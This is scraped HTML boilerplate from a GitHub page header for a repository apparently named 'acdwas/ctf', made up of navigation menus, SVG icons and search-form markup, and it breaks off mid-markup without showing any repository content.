<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="124655323" data-scoped-search-url="/acdwas/ctf/search" data-owner-scoped-search-url="/users/acdwas/search" data-unscoped-search-url="/search" data-turbo="false" action="/acdwas/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="mbERXu72PeF31WX0BD1XzE/QMyenB3WafHN54L+AUgIhJ4w5u83xn3haKT1NVa5qXAMfX2KC4hHPFzYSkOWE+w==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 